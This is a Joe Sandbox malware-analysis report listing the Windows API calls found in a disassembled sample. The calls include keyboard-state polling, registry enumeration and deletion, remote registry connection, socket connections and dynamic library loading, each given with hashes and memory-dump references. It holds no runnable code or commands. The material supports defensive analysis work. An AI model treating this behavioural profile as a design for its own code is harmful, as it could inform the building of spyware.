                                                            • Instruction ID: 8eac61321038dbd32bfe14263504560db7c98c8fbeeeb2eb49a46d34c9d63f73
                                                            • Opcode Fuzzy Hash: 964dbc2a73d3b51658c129c0940897b8911b785c40af9afe88b96a44e5c449bd
                                                            • Instruction Fuzzy Hash: 272180756007096BD610AF69DC89FAF73A8FB88704F00841FF918A7241DAB8A9418B69
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1681305208.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681354302.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681369519.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681386532.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681403540.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681403540.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681461369.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 0beeaaa579c9339ee211e6c40176bce708d39a94b7630d2852c1f2343b6e5e4f
                                                            • Instruction ID: b0f148a0463f8e77612455c4d0488571574065cadd758f34d18f988e9301810f
                                                            • Opcode Fuzzy Hash: 0beeaaa579c9339ee211e6c40176bce708d39a94b7630d2852c1f2343b6e5e4f
                                                            • Instruction Fuzzy Hash: 2A819F74600604BFEB24CF95C994FBB7B68EF59350F10804EF8959B341E6B8AC45CB6A
                                                            APIs
                                                            • GetCurrentProcessId.KERNEL32(?), ref: 0047584D
                                                            • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 0047585B
                                                            • GetProcessIoCounters.KERNEL32(00000000,?), ref: 0047587F
                                                            • CloseHandle.KERNEL32(00000000), ref: 00475A4D
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1681305208.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681354302.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681369519.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681386532.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681403540.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681403540.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681461369.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID: Process$CloseCountersCurrentHandleOpen
                                                            • String ID:
                                                            • API String ID: 3488606520-0
                                                            APIs
                                                              • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                              • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                            • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0046B5B5
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1681305208.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681354302.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681369519.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681386532.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681403540.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681403540.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681461369.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID: ConnectRegistry_memmove_wcslen
                                                            • String ID:
                                                            • API String ID: 15295421-0
                                                            APIs
                                                            • LoadLibraryW.KERNEL32(00000000,?,?,?), ref: 0046485D
                                                            • GetProcAddress.KERNEL32(?,?), ref: 004648F7
                                                            • GetProcAddress.KERNEL32(?,00000000), ref: 00464916
                                                            • GetProcAddress.KERNEL32(?,?), ref: 0046495A
                                                            • FreeLibrary.KERNEL32(?,?,?,?), ref: 0046497C
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1681305208.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681354302.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681369519.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681386532.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681403540.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681403540.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681461369.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID: AddressProc$Library$FreeLoad
                                                            • String ID:
                                                            • API String ID: 2449869053-0
                                                            APIs
                                                            • GetCursorPos.USER32(?), ref: 004563A6
                                                            • ScreenToClient.USER32(?,?), ref: 004563C3
                                                            • GetAsyncKeyState.USER32(?), ref: 00456400
                                                            • GetAsyncKeyState.USER32(?), ref: 00456410
                                                            • GetWindowLongW.USER32(?,000000F0), ref: 00456466
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1681305208.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681354302.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681369519.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681386532.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681403540.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681403540.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681461369.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID: AsyncState$ClientCursorLongScreenWindow
                                                            • String ID:
                                                            • API String ID: 3539004672-0
                                                            APIs
                                                            • InterlockedIncrement.KERNEL32(004A7F04), ref: 0047D438
                                                            • InterlockedDecrement.KERNEL32(004A7F04), ref: 0047D44D
                                                            • Sleep.KERNEL32(0000000A), ref: 0047D455
                                                            • InterlockedIncrement.KERNEL32(004A7F04), ref: 0047D460
                                                            • InterlockedDecrement.KERNEL32(004A7F04), ref: 0047D56A
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1681305208.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681354302.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681369519.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681386532.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681403540.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681403540.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681461369.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID: Interlocked$DecrementIncrement$Sleep
                                                            • String ID:
                                                            • API String ID: 327565842-0
                                                            APIs
                                                            • GetPrivateProfileSectionW.KERNEL32(00000000,?,?,00007FFF), ref: 0045C44F
                                                            • GetPrivateProfileSectionW.KERNEL32(00000000,00000003,?,00000003), ref: 0045C477
                                                            • WritePrivateProfileSectionW.KERNEL32(00000000,00000003,?), ref: 0045C4C3
                                                            • WritePrivateProfileStringW.KERNEL32(00000000,?,00000000,00000000), ref: 0045C4E7
                                                            • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 0045C4F6
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1681305208.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681354302.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681369519.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681386532.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681403540.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681403540.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681461369.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID: PrivateProfile$SectionWrite$String
                                                            • String ID:
                                                            • API String ID: 2832842796-0
                                                            APIs
                                                            • RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,?), ref: 00441CA9
                                                            • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00441CDD
                                                            • RegCloseKey.ADVAPI32(?), ref: 00441CFE
                                                            • RegDeleteKeyW.ADVAPI32(?,?), ref: 00441D40
                                                            • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 00441D6E
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1681305208.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681354302.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681369519.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681386532.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681403540.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681403540.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681461369.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID: Enum$CloseDeleteOpen
                                                            • String ID:
                                                            • API String ID: 2095303065-0
                                                            APIs
                                                            • GetWindowRect.USER32(?,?), ref: 00436A24
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1681305208.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681354302.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681369519.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681386532.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681403540.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681403540.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681461369.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID: RectWindow
                                                            • String ID:
                                                            • API String ID: 861336768-0
                                                            APIs
                                                            • SendMessageW.USER32 ref: 00449598
                                                              • Part of subcall function 00430626: _wcspbrk.LIBCMT ref: 00430636
                                                            • SendMessageW.USER32(?,00001074,?,?), ref: 004495F8
                                                            • _wcslen.LIBCMT ref: 0044960D
                                                            • _wcslen.LIBCMT ref: 0044961A
                                                            • SendMessageW.USER32(?,00001074,?,?), ref: 0044964E
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1681305208.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681354302.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681369519.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681386532.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681403540.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681403540.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681461369.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID: MessageSend$_wcslen$_wcspbrk
                                                            • String ID:
                                                            • API String ID: 1856069659-0
                                                            APIs
                                                            • GetCursorPos.USER32(?), ref: 004478E2
                                                            • TrackPopupMenuEx.USER32(00000000,00000000,?,?,?,00000000), ref: 004478FC
                                                            • DefDlgProcW.USER32(?,0000007B,?,?), ref: 0044791D
                                                            • GetCursorPos.USER32(00000000), ref: 0044796A
                                                            • TrackPopupMenuEx.USER32(02E86500,00000000,00000000,?,?,00000000), ref: 00447991
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1681305208.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681354302.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681369519.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681386532.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681403540.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681403540.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681461369.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID: CursorMenuPopupTrack$Proc
                                                            • String ID:
                                                            • API String ID: 1300944170-0
                                                            APIs
                                                            • GetClientRect.USER32(?,?), ref: 004479CC
                                                            • GetCursorPos.USER32(?), ref: 004479D7
                                                            • ScreenToClient.USER32(?,?), ref: 004479F3
                                                            • WindowFromPoint.USER32(?,?), ref: 00447A34
                                                            • DefDlgProcW.USER32(?,00000020,?,?), ref: 00447AAD
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1681305208.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681354302.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681369519.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681386532.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681403540.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681403540.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681461369.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID: Client$CursorFromPointProcRectScreenWindow
                                                            • String ID:
                                                            • API String ID: 1822080540-0
                                                            APIs
                                                            • GetWindowRect.USER32(?,?), ref: 00447C5D
                                                            • ScreenToClient.USER32(?,?), ref: 00447C7B
                                                            • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 00447C8E
                                                            • Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 00447CD5
                                                            • EndPaint.USER32(?,?), ref: 00447D13
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1681305208.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681354302.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681369519.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681386532.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681403540.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681403540.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681461369.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID: ClientPaintRectRectangleScreenViewportWindow
                                                            • String ID:
                                                            • API String ID: 659298297-0
                                                            • Opcode ID: 9df24dda7700d3462e91b7be9c0077b8f1985bebde9900174ed076ebcab1caeb
                                                            • Instruction ID: 3c0582d8bc81ba5dadaaf244cb1f1d3939805113443e317e1f98b5bdeebaec33
                                                            • Opcode Fuzzy Hash: 9df24dda7700d3462e91b7be9c0077b8f1985bebde9900174ed076ebcab1caeb
                                                            • Instruction Fuzzy Hash: C33161706043019FE310CF25D8C8F7B7BE8EB86724F144A6EF9A5872A1C774A845DB69
                                                            APIs
                                                            • EnableWindow.USER32(?,00000000), ref: 00448B5C
                                                            • EnableWindow.USER32(?,00000001), ref: 00448B72
                                                            • ShowWindow.USER32(?,00000000), ref: 00448BE8
                                                            • ShowWindow.USER32(?,00000004), ref: 00448BF4
                                                            • EnableWindow.USER32(?,00000001), ref: 00448C09
                                                              • Part of subcall function 00440D98: SendMessageW.USER32(?,000000F0,00000000,00000000), ref: 00440DB8
                                                              • Part of subcall function 00440D98: GetWindowLongW.USER32(?,000000F0), ref: 00440DFA
                                                              • Part of subcall function 00440D98: GetWindowLongW.USER32(?,000000F0), ref: 00440E3A
                                                              • Part of subcall function 00440D98: SendMessageW.USER32(02E81A90,000000F1,00000000,00000000), ref: 00440E6E
                                                              • Part of subcall function 00440D98: SendMessageW.USER32(02E81A90,000000F1,00000001,00000000), ref: 00440E9A
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1681305208.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681354302.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681369519.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681386532.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681403540.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681403540.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681461369.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID: Window$EnableMessageSend$LongShow
                                                            • String ID:
                                                            • API String ID: 142311417-0
                                                            • Opcode ID: 426854c6b9cbeb660193a9c091743316caa306963ba13d8f93245475b3a006f2
                                                            • Instruction ID: c941ec4e4e3d0536419715940b2668e48b64c275bb9f23e9dd6fd7b29375311a
                                                            • Opcode Fuzzy Hash: 426854c6b9cbeb660193a9c091743316caa306963ba13d8f93245475b3a006f2
                                                            • Instruction Fuzzy Hash: DE21F7B17443805BF7258E24CCC4BAFB7D0EF56345F08482EF98196391DBACA885C75A
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1681305208.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681354302.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681369519.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681386532.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681403540.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681403540.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681461369.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: cfa96c7b92ceffa4878489be5d10f88277f639196488ca8149908940c9a32487
                                                            • Instruction ID: af34b986bc09d21a6a739d25b45c5a22770885c200d938a8bd6fc5fff5094107
                                                            • Opcode Fuzzy Hash: cfa96c7b92ceffa4878489be5d10f88277f639196488ca8149908940c9a32487
                                                            • Instruction Fuzzy Hash: 5921AE75200600DBC710EF29E9D496B77B9EF49362B00466EFE5197392DB34EC09CB69
                                                            APIs
                                                            • IsWindowVisible.USER32(?), ref: 00445879
                                                            • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 00445893
                                                            • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 004458CD
                                                            • _wcslen.LIBCMT ref: 004458FB
                                                            • CharUpperBuffW.USER32(00000000,00000000), ref: 00445905
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1681305208.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681354302.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681369519.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681386532.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681403540.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681403540.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681461369.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID: MessageSend$BuffCharUpperVisibleWindow_wcslen
                                                            • String ID:
                                                            • API String ID: 3087257052-0
                                                            • Opcode ID: 622372a4a32610ce73fb3647056b26e365a1681bd10d6cc102ac189a3bd4553b
                                                            • Instruction ID: ced771b0f23340e5f55e8fdbc4e1763ce6d97a07fd0b425722e47bce61cb145a
                                                            • Opcode Fuzzy Hash: 622372a4a32610ce73fb3647056b26e365a1681bd10d6cc102ac189a3bd4553b
                                                            • Instruction Fuzzy Hash: F51136726009017BFB10AB25DC06F9FB78CAF65360F04403AF909D7241EB69ED5983A9
                                                            APIs
                                                              • Part of subcall function 00465225: inet_addr.WSOCK32(?), ref: 00465249
                                                            • socket.WSOCK32(00000002,00000001,00000006), ref: 004653FE
                                                            • WSAGetLastError.WSOCK32(00000000), ref: 0046540D
                                                            • connect.WSOCK32(00000000,?,00000010), ref: 00465446
                                                            • WSAGetLastError.WSOCK32(00000000), ref: 0046546D
                                                            • closesocket.WSOCK32(00000000), ref: 00465481
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1681305208.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681354302.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681369519.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681386532.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681403540.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681403540.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681461369.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID: ErrorLast$closesocketconnectinet_addrsocket
                                                            • String ID:
                                                            • API String ID: 245547762-0
                                                            • Opcode ID: 4a364c3b246f50765ea579ebeb5236c2c367babb38bf5793ee33ccca847a6907
                                                            • Instruction ID: 0a95abeaf907522bb910ccff47ca5b8cdb65f95d12881c86cce1eb50970c9d0a
                                                            • Opcode Fuzzy Hash: 4a364c3b246f50765ea579ebeb5236c2c367babb38bf5793ee33ccca847a6907
                                                            • Instruction Fuzzy Hash: E921F032200510ABD310EF29DC49F6EB7E8EF44725F008A6FF844E72D1DBB4A8418B99
                                                            APIs
                                                            • DeleteObject.GDI32(00000000), ref: 004471D8
                                                            • ExtCreatePen.GDI32(?,?,?,00000000,00000000), ref: 00447218
                                                            • SelectObject.GDI32(?,00000000), ref: 00447228
                                                            • BeginPath.GDI32(?), ref: 0044723D
                                                            • SelectObject.GDI32(?,00000000), ref: 00447266
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1681305208.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681354302.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681369519.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681386532.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681403540.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681403540.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681461369.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID: Object$Select$BeginCreateDeletePath
                                                            • String ID:
                                                            • API String ID: 2338827641-0
                                                            • Opcode ID: 2b4904aa023ab9776d85036867689c5727337e5a2013c968bceed19ab76b7b02
                                                            • Instruction ID: fd3aca4fc88a528095528039be3f852d236b7ebb9f74560e76bd8f11b15fbd2f
                                                            • Opcode Fuzzy Hash: 2b4904aa023ab9776d85036867689c5727337e5a2013c968bceed19ab76b7b02
